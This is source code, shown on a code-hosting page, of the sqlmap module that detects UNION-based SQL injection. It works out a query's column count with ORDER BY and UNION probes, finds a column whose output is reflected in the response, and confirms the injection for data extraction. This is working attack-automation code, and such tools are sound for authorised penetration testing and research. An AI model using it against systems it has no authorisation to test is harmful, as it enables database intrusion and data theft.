Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
sqlmapproject
GitHub Repository: sqlmapproject/sqlmap
Path: blob/master/lib/techniques/union/test.py
2992 views
1
#!/usr/bin/env python
2
3
"""
4
Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5
See the file 'LICENSE' for copying permission
6
"""
7
8
import itertools
9
import logging
10
import random
11
import re
12
13
from lib.core.agent import agent
14
from lib.core.common import average
15
from lib.core.common import Backend
16
from lib.core.common import getPublicTypeMembers
17
from lib.core.common import isNullValue
18
from lib.core.common import listToStrValue
19
from lib.core.common import popValue
20
from lib.core.common import pushValue
21
from lib.core.common import randomInt
22
from lib.core.common import randomStr
23
from lib.core.common import readInput
24
from lib.core.common import removeReflectiveValues
25
from lib.core.common import setTechnique
26
from lib.core.common import singleTimeLogMessage
27
from lib.core.common import singleTimeWarnMessage
28
from lib.core.common import stdev
29
from lib.core.common import wasLastResponseDBMSError
30
from lib.core.compat import xrange
31
from lib.core.data import conf
32
from lib.core.data import kb
33
from lib.core.data import logger
34
from lib.core.data import queries
35
from lib.core.decorators import stackedmethod
36
from lib.core.dicts import FROM_DUMMY_TABLE
37
from lib.core.enums import FUZZ_UNION_COLUMN
38
from lib.core.enums import PAYLOAD
39
from lib.core.settings import FUZZ_UNION_ERROR_REGEX
40
from lib.core.settings import FUZZ_UNION_MAX_COLUMNS
41
from lib.core.settings import LIMITED_ROWS_TEST_NUMBER
42
from lib.core.settings import MAX_RATIO
43
from lib.core.settings import MIN_RATIO
44
from lib.core.settings import MIN_STATISTICAL_RANGE
45
from lib.core.settings import MIN_UNION_RESPONSES
46
from lib.core.settings import NULL
47
from lib.core.settings import ORDER_BY_MAX
48
from lib.core.settings import ORDER_BY_STEP
49
from lib.core.settings import UNION_MIN_RESPONSE_CHARS
50
from lib.core.settings import UNION_STDEV_COEFF
51
from lib.core.unescaper import unescaper
52
from lib.request.comparison import comparison
53
from lib.request.connect import Connect as Request
54
55
def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=PAYLOAD.WHERE.ORIGINAL):
    """
    Finds the number of columns of the query affected by UNION based
    injection

    When applicable, an 'ORDER BY' probe is tried first. Otherwise, one
    UNION request is issued per candidate column count and the count whose
    response differs from the rest (by reflected kb.uChar or by comparison
    ratio) is picked

    Returns the column count, or None if no candidate stands out
    """

    retVal = None

    @stackedmethod
    def _orderByTechnique(lowerCount=None, upperCount=None):
        def _orderByTest(cols):
            # Truthy when the response to 'ORDER BY <cols>' looks like the clause has been accepted
            query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix)
            query = agent.suffixQuery(query, suffix=suffix, comment=comment)
            payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where)
            page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)

            # Error markers are counted only if they are not part of the original page template
            complained = any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order (by|clause)", "unknown column", "failed"))

            if not complained and not kb.heavilyDynamic:
                matched = comparison(page, headers, code)
                if matched:
                    return matched

            # This particular message is treated as a positive outcome regardless of the checks above
            return re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None

        # Usable only if the lowest column passes while an out-of-range one fails
        # (second request is sent only when the first test has passed)
        if not _orderByTest(1 if lowerCount is None else lowerCount):
            return None

        if _orderByTest(randomInt() if upperCount is None else upperCount + 1):
            return None

        infoMsg = ("'ORDER BY' technique appears to be usable. "
                   "This should reduce the time needed "
                   "to find the right number "
                   "of query columns. Automatically extending the "
                   "range for current UNION query injection technique test")
        singleTimeLogMessage(infoMsg)

        lowCols = 1 if lowerCount is None else lowerCount
        highCols = ORDER_BY_STEP if upperCount is None else upperCount
        found = None

        while not found:
            if not conf.uCols and _orderByTest(highCols):
                # Upper bound still accepted - move the window up
                lowCols = highCols
                highCols += ORDER_BY_STEP

                if highCols > ORDER_BY_MAX:
                    break
            else:
                # Bisect between the last accepted and the first rejected column
                while not found:
                    mid = highCols - (highCols - lowCols) // 2

                    if _orderByTest(mid):
                        lowCols = mid
                    else:
                        highCols = mid

                    if (highCols - lowCols) < 2:
                        found = lowCols

        return found

    try:
        pushValue(kb.errorIsNone)
        samples, ratios = [], []
        kb.errorIsNone = False
        lowerCount, upperCount = conf.uColsStart, conf.uColsStop

        if kb.orderByColumns is None and (lowerCount == 1 or conf.uCols):  # Note: ORDER BY is not bullet-proof
            if conf.uCols:
                found = _orderByTechnique(lowerCount, upperCount)
            else:
                found = _orderByTechnique()

            if found:
                kb.orderByColumns = found
                infoMsg = "target URL appears to have %d column%s in query" % (found, 's' if found > 1 else "")
                singleTimeLogMessage(infoMsg)
                return found
            elif kb.futileUnion:
                return None

        # Widen a too narrow range so that there are enough responses to compare
        if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES:
            upperCount = lowerCount + MIN_UNION_RESPONSES

        min_, max_ = MAX_RATIO, MIN_RATIO
        pages = {}

        for count in xrange(lowerCount, upperCount + 1):
            query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
            payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
            page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)

            # Pages are kept only when a non-NULL filler char can be looked for in them
            if not isNullValue(kb.uChar):
                pages[count] = page

            ratio = comparison(page, headers, code, getRatioValue=True) or MIN_RATIO
            ratios.append(ratio)
            min_, max_ = min(min_, ratio), max(max_, ratio)
            samples.append((count, ratio))

        if not isNullValue(kb.uChar):
            marker = re.escape(kb.uChar.strip("'"))

            # Accept the count only if exactly one response carries the filler char
            for regex in (marker, r'>\s*%s\s*<' % marker):
                contains = [count for count, content in pages.items() if re.search(regex, content or "", re.IGNORECASE) is not None]

                if len(contains) == 1:
                    retVal = contains[0]
                    break

        if not retVal:
            # Leave out a single occurrence of each extreme before judging the rest
            if min_ in ratios:
                ratios.remove(min_)
            if max_ in ratios:
                ratios.remove(max_)

            minItem, maxItem = None, None

            for sample in samples:
                if sample[1] == min_:
                    minItem = sample
                elif sample[1] == max_:
                    maxItem = sample

            if all(_ == min_ and _ != max_ for _ in ratios):
                # Everything else sits at the minimum - the maximum is the odd one
                retVal = maxItem[0]

            elif all(_ != min_ and _ == max_ for _ in ratios):
                # Everything else sits at the maximum - the minimum is the odd one
                retVal = minItem[0]

            elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE:
                deviation = stdev(ratios)

                if deviation is not None:
                    mean = average(ratios)
                    lower = mean - UNION_STDEV_COEFF * deviation
                    upper = mean + UNION_STDEV_COEFF * deviation

                    if min_ < lower:
                        retVal = minItem[0]

                    # Maximum wins when it lies further outside of the band than the minimum
                    if max_ > upper:
                        if retVal is None or abs(max_ - upper) > abs(min_ - lower):
                            retVal = maxItem[0]
    finally:
        kb.errorIsNone = popValue()

    if retVal:
        infoMsg = "target URL appears to be UNION injectable with %d columns" % retVal
        singleTimeLogMessage(infoMsg, logging.INFO, re.sub(r"\d+", 'N', infoMsg))

    return retVal
183
184
def _fuzzUnionCols(place, parameter, prefix, suffix):
    """
    Tries combinations of column types (members of FUZZ_UNION_COLUMN) for
    an UNION query with kb.orderByColumns columns

    Returns list of used column expressions, where the one whose random
    string has been found in the response is replaced with "%s", or None
    if no combination has worked (or the test is not applicable)
    """

    if not Backend.getIdentifiedDbms():
        return None

    # Template page already matching the error regex would make responses indistinguishable
    if re.search(FUZZ_UNION_ERROR_REGEX, kb.pageTemplate or ""):
        return None

    if not kb.orderByColumns:
        return None

    comment = queries[Backend.getIdentifiedDbms()].comment.query

    choices = getPublicTypeMembers(FUZZ_UNION_COLUMN, True)
    random.shuffle(choices)

    for combination in itertools.product(choices, repeat=kb.orderByColumns):
        # At least one string column is required to carry the searched random string
        if FUZZ_UNION_COLUMN.STRING not in combination:
            continue

        columns = [_.replace(FUZZ_UNION_COLUMN.INTEGER, str(randomInt())).replace(FUZZ_UNION_COLUMN.STRING, "'%s'" % randomStr(20)) for _ in combination]

        query = agent.prefixQuery("UNION ALL SELECT %s%s" % (','.join(columns), FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), "")), prefix=prefix)
        query = agent.suffixQuery(query, suffix=suffix, comment=comment)
        payload = agent.payload(newValue=query, place=place, parameter=parameter, where=PAYLOAD.WHERE.NEGATIVE)
        page, _headers, _code = Request.queryPage(payload, place=place, content=True, raise404=False)

        if re.search(FUZZ_UNION_ERROR_REGEX, page or ""):
            continue

        for column in columns:
            # Quoted column whose content got reflected is the usable one
            if column.startswith("'") and column.strip("'") in (page or ""):
                return [(_ if _ != column else "%s") for _ in columns]

    return None
213
214
def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL):
    """
    Searches for the column position (out of 'count' columns) that can be
    used for retrieval of UNION query output

    Returns tuple (validPayload, vector), where validPayload is the first
    payload whose response contained the delimited random string, while
    vector is a tuple (position, count, comment, prefix, suffix, kb.uChar,
    where, kb.unionDuplicates, <partial mode flag>, kb.tableFrom,
    kb.unionTemplate). Both values are None if no position has been found
    """

    validPayload = None
    vector = None

    positions = list(xrange(0, count))

    # Unbiased approach for searching appropriate usable column
    random.shuffle(positions)

    # Longer random strings are tried first, falling back to the minimal length
    for charCount in (UNION_MIN_RESPONSE_CHARS << 2, UNION_MIN_RESPONSE_CHARS):
        if vector:
            break

        # For each column of the table (# of NULL) perform a request using
        # the UNION ALL SELECT statement to test if the target URL is
        # affected by an exploitable union SQL injection vulnerability
        for position in positions:
            # Prepare expression with delimiters
            randQuery = randomStr(charCount)
            phrase = ("%s%s%s" % (kb.chars.start, randQuery, kb.chars.stop)).lower()
            randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
            randQueryUnescaped = unescaper.escape(randQueryProcessed)

            # Forge the union SQL injection request
            query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where)
            payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)

            # Perform the request
            page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
            content = ("%s%s" % (removeReflectiveValues(page, payload) or "", removeReflectiveValues(listToStrValue(headers.headers if headers else None), payload, True) or "")).lower()

            if content and phrase in content:
                # Note: 'payload' gets rebound by the follow-up checks, while the first working one is reported
                validPayload = payload

                # Note: phrase is a literal (already lowercased) text, hence counted as such - same as
                # in membership test above and limited rows check below - not interpreted as a regex
                kb.unionDuplicates = content.count(phrase) > 1
                vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, conf.forcePartial, kb.tableFrom, kb.unionTemplate)

                if where == PAYLOAD.WHERE.ORIGINAL:
                    # Prepare expression with delimiters
                    randQuery2 = randomStr(charCount)
                    phrase2 = ("%s%s%s" % (kb.chars.start, randQuery2, kb.chars.stop)).lower()
                    randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
                    randQueryUnescaped2 = unescaper.escape(randQueryProcessed2)

                    # Confirm that it is a full union SQL injection
                    query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2)
                    payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)

                    # Perform the request
                    page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
                    content = ("%s%s" % (page or "", listToStrValue(headers.headers if headers else None) or "")).lower()

                    if not all(_ in content for _ in (phrase, phrase2)):
                        # Both phrases are not shown together - partial mode flag is set
                        vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True, kb.tableFrom, kb.unionTemplate)
                    elif not kb.unionDuplicates:
                        fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr())

                        # Check for limited row output
                        query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable)
                        payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)

                        # Perform the request
                        page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
                        content = ("%s%s" % (removeReflectiveValues(page, payload) or "", removeReflectiveValues(listToStrValue(headers.headers if headers else None), payload, True) or "")).lower()

                        # Fewer occurrences than selected rows means that the output is being cut
                        if 0 < content.count(phrase) < LIMITED_ROWS_TEST_NUMBER:
                            warnMsg = "output with limited number of rows detected. Switching to partial mode"
                            logger.warning(warnMsg)
                            vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True, kb.tableFrom, kb.unionTemplate)

                unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError()

                if unionErrorCase and count > 1:
                    # Keep looking through the remaining positions
                    warnMsg = "combined UNION/error-based SQL injection case found on "
                    warnMsg += "column %d. sqlmap will try to find another " % (position + 1)
                    warnMsg += "column with better characteristics"
                    logger.warning(warnMsg)
                else:
                    break

    return validPayload, vector
293
294
def _unionConfirm(comment, place, parameter, prefix, suffix, count):
    """
    Confirms the UNION SQL injection and gets the exact column position
    which can be used to extract data

    Returns tuple (validPayload, vector) as given by _unionPosition()
    """

    # First attempt goes with the default 'where' of _unionPosition()
    validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count)

    if validPayload:
        return validPayload, vector

    # Nothing usable found - retry with the negative 'where'
    validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE)

    return validPayload, vector
308
309
def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix):
    """
    Tests if the target URL is affected by an UNION SQL injection
    vulnerability: finds out the number of query columns (unless stated
    by user), confirms usable column position and, on failure, offers
    fallbacks (fuzzy column types test, random integer filler char)

    Returns tuple (validPayload, vector); both are None on failure
    """

    initialOrderBy = kb.orderByColumns
    initialChars = (conf.uChar, kb.uChar)
    where = PAYLOAD.WHERE.ORIGINAL if isNullValue(kb.uChar) else PAYLOAD.WHERE.NEGATIVE

    # In case that user explicitly stated number of columns affected
    if conf.uColsStop == conf.uColsStart:
        count = conf.uColsStart
    else:
        count = _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where)

    if not count:
        return None, None

    validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count)

    if not (validPayload and vector) and not (conf.uChar and conf.dbms and kb.unionTemplate):
        # User is asked only while the answer is not known (kb.fuzzUnionTest is None)
        if Backend.getIdentifiedDbms() and kb.orderByColumns and kb.orderByColumns < FUZZ_UNION_MAX_COLUMNS and kb.fuzzUnionTest is None:
            msg = "do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] "
            kb.fuzzUnionTest = readInput(msg, default='N', boolean=True)

            if kb.fuzzUnionTest:
                kb.unionTemplate = _fuzzUnionCols(place, parameter, prefix, suffix)

        warnMsg = "if UNION based SQL injection is not detected, please consider "

        if not conf.uChar and count > 1 and kb.uChar == NULL and conf.uValues is None:
            message = "injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] "

            if readInput(message, default='Y', boolean=True):
                conf.uChar = kb.uChar = str(randomInt(2))
                validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count)
            else:
                warnMsg += "usage of option '--union-char' (e.g. '--union-char=1') "

        if not conf.dbms:
            warnMsg += "forcing the " if conf.uChar else "and/or try to force the "
            warnMsg += "back-end DBMS (e.g. '--dbms=mysql') "

        # Message left without any suggestion is not worth showing
        if not (validPayload and vector) and not warnMsg.endswith("consider "):
            singleTimeWarnMessage(warnMsg)

    # Discard ORDER BY results (not usable - e.g. maybe invalid altogether)
    if initialOrderBy is None and kb.orderByColumns is not None and not (validPayload and vector):
        conf.uChar, kb.uChar = initialChars
        validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)

    return validPayload, vector
369
370
@stackedmethod
def unionTest(comment, place, parameter, value, prefix, suffix):
    """
    Tests if the target URL is affected by an UNION SQL injection
    vulnerability

    Returns tuple (validPayload, vector), with payload delimiters removed
    from validPayload, or None in case of a direct connection (conf.direct)
    """

    if conf.direct:
        return

    wasNegativeLogic = kb.negativeLogic
    setTechnique(PAYLOAD.TECHNIQUE.UNION)

    try:
        # Negative logic and related response matching settings are suspended during the test
        if wasNegativeLogic:
            for current in (kb.negativeLogic, conf.string, conf.code):
                pushValue(current)

            kb.negativeLogic = False
            conf.string = conf.code = None

        validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
    finally:
        # Restored in reverse order of pushing
        if wasNegativeLogic:
            conf.code = popValue()
            conf.string = popValue()
            kb.negativeLogic = popValue()

    return (agent.removePayloadDelimiters(validPayload) if validPayload else validPayload), vector
403
404